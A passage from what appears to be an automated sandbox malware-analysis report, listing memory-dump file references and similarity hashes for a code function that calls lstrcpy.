                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy
                                    • String ID:
                                    • API String ID: 3722407311-0
                                    • Opcode ID: 0c4a16dbfabd4025b75bc5fb2d82a979cd671a619393c5771004cbc1d6d27305
                                    • Instruction ID: 7136b8c53c2029f277d84fd036fba464763242105b6b0de1c1894defa58809a3
                                    • Opcode Fuzzy Hash: 0c4a16dbfabd4025b75bc5fb2d82a979cd671a619393c5771004cbc1d6d27305
                                    • Instruction Fuzzy Hash: C61130B8A11B029BDB249F35D45D927B7F8FF48315708093DA4A6C3A40EB35E841DB94